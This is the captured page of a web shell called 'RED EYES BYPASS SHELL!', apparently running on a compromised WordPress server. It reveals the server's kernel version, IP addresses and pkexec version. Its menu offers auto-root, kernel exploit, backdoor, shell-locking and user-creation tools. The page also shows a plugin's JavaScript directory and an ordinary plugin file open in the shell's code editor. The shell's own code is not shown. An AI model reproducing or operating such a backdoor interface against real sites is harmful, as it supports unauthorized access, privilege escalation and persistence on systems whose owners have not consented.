Linux sothorn202 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
pr /
wp-content /
plugins /
monarch /
core /
admin /
js /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
checkbox.js
2.62
KB
-rwxr-xr-x
colorpicker.js
16.58
KB
-rwxr-xr-x
common.js
1.31
KB
-rwxr-xr-x
compatibility-warning.js
1.83
KB
-rwxr-xr-x
core.js
5.56
KB
-rwxr-xr-x
es6-promise.auto.min.js
6.66
KB
-rwxr-xr-x
eye.js
935
B
-rwxr-xr-x
frame-helpers.js
1.04
KB
-rwxr-xr-x
functions-init.js
8.72
KB
-rwxr-xr-x
page-resource-fallback.js
854
B
-rwxr-xr-x
page-resource-fallback.min.js
293
B
-rwxr-xr-x
popper.min.js
16.91
KB
-rwxr-xr-x
portability.js
23.41
KB
-rwxr-xr-x
react-dom.production.min.js
123.06
KB
-rwxr-xr-x
react.production.min.js
13.86
KB
-rwxr-xr-x
recaptcha.js
1.66
KB
-rwxr-xr-x
support-center.js
19.29
KB
-rwxr-xr-x
tippy.min.js
22.71
KB
-rwxr-xr-x
version-rollback.js
2.41
KB
-rwxr-xr-x
wp-color-picker-alpha.min.js
8.32
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : page-resource-fallback.js
// NOTE: A minified copy of this script will be generated by grunt. Only the minified file will be included in zipped releases. /** * Callback for the 'onload' and 'onerror' events of <link>/<script> tags for page resources. * * @param {HTMLElement} el * @param {boolean} is_error */ function et_core_page_resource_fallback( el, is_error ) { if ( 'undefined' === typeof is_error ) { // This is an onload event (Internet Explorer doesn't fire 'onerror' for link tags) is_error = el.sheet.cssRules && 0 === el.sheet.cssRules.length; } if ( ! is_error ) { return; } // Prevent infinite recursion el.onerror = null; el.onload = null; if ( el.href ) { el.href = et_site_url + '/?et_core_page_resource=' + el.id + et_post_id; } else if ( el.src ) { el.src = et_site_url + '/?et_core_page_resource=' + el.id + et_post_id; } }
Close